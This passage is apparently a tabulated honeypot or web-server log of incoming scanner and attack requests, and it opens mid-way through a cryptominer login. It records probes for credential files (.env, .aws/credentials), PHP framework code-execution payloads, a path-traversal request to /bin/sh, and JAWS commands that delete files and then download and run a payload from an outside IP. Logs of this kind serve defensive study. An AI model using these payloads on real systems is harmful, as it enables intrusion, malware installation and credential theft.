(Windows NT 10.0; Win64; x64) libuv/1.42.0 msvc/2019\",\"algo\":[\"cn/1\",\"cn/2\",\"cn/r\",\"cn/fast\",\"cn/half\",\"cn/xao\",\"cn/rto\",\"cn/rwz\",\"cn/zls\",\"cn/double\",\"cn/ccx\",\"cn-lite/1\",\"cn-heavy/0\",\"cn-heavy/tube\",\"cn-heavy/xhv\",\"cn-pico\",\"cn-pico/tlo\",\"cn/upx2\",\"rx/0\",\"rx/wow\",\"rx/arq\",\"rx/graft\",\"rx/sfx\",\"rx/keva\",\"argon2/chukwa\",\"argon2/chukwav2\",\"argon2/ninja\",\"astrobwt\"]}} | |
| 1 | {\"id\":1,\"method\":\"eth_submitLogin\",\"worker\":\"igwrcvap\",\"params\":[\"0x9403c2c6dcefb6721f7c7474e96be9732a79aab6\",\"x\"],\"jsonrpc\":\"2.0\"} |
||
| 1 | {\"id\": |
1, \"method\": \"mining.subscribe\", \"params\": [\"MinerName/1.0.0\", \"EthereumStratum/1.0.0\"]} | |
| 1 | {\"id\": |
1, \"method\": \"mining.subscribe\", \"params\": [\"cpuminer/2.5.1\"]} | |
| 4 | CONNECT | google[.]com:443 |
HTTP/1.1 |
| 1 | CONNECT | www[.]apple[.]com:443 |
HTTP/1.1 |
| 1 | GET | /.aws/credentials |
HTTP/1.1 |
| 24 | GET | /.env |
HTTP/1.1 |
| 1 | GET | /.git/config |
HTTP/1.1 |
| 1 | GET | /.well-known/security.txt |
HTTP/1.1 |
| 1 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
| 1 | GET | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> |
HTTP/1.1 |
| 1 | GET | /SiteLoader |
HTTP/1.1 |
| 1 | GET | /WuEL |
HTTP/1.1 |
| 1 | GET | /_ignition/execute-solution |
HTTP/1.1 |
| 1 | GET | /_profiler/phpinfo |
HTTP/1.1 |
| 1 | GET | /a |
HTTP/1.1 |
| 1 | GET | /actuator/gateway/routes |
HTTP/1.1 |
| 1 | GET | /admin/.env |
HTTP/1.1 |
| 1 | GET | /app/.env |
HTTP/1.1 |
| 1 | GET | /app/config/parameters.yml |
HTTP/1.1 |
| 1 | GET | /backend/.env |
HTTP/1.1 |
| 1 | GET | /config/getuser?index=0 |
HTTP/1.1 |
| 1 | GET | /console/ |
HTTP/1.1 |
| 1 | GET | /download/file.ext |
HTTP/1.1 |
| 1 | GET | /druid/index.html |
HTTP/1.1 |
| 8 | GET | /favicon.ico |
HTTP/1.1 |
| 1 | GET | /geoserver/web/ |
HTTP/1.1 |
| 1 | GET | /geoserver |
HTTP/1.1 |
| 1 | GET | /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 |
HTTP/1.1 |
| 1 | GET | /info.php |
HTTP/1.1 |
| 1 | GET | /laravel/.env |
HTTP/1.1 |
| 1 | GET | /mPlayer |
HTTP/1.1 |
| 1 | GET | /portal/redlion |
HTTP/1.1 |
| 1 | GET | /prod/.env |
HTTP/1.1 |
| 1 | GET | /robots.txt |
HTTP/1.1 |
| 2 | GET | /shell?cd+/tmp;rm+-rf+*;wget+ 212.8.251.176/jaws;sh+/tmp/jaws |
|
| 1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+109[.]122[.]221[.]134/jaws;sh+/tmp/jaws |
HTTP/1.1 |
| 1 | GET | /sitemap.xml |
HTTP/1.1 |
| 1 | GET | /solr/admin/info/system?wt=json |
HTTP/1.1 |
| 1 | GET | /systembc/password.php |
HTTP/1.0 |
| 1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
| 1 | GET | stager64 |
HTTP/1.1 |
| 1 | POST | /Autodiscover/Autodiscover.xml |
HTTP/1.1 |
| 1 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
| 1 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh |
HTTP/1.1 |
| 1 | POST | /mgmt/tm/util/bash |
HTTP/1.1 |
| 1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
| 4 | PRI | * |
HTTP/2.0 |
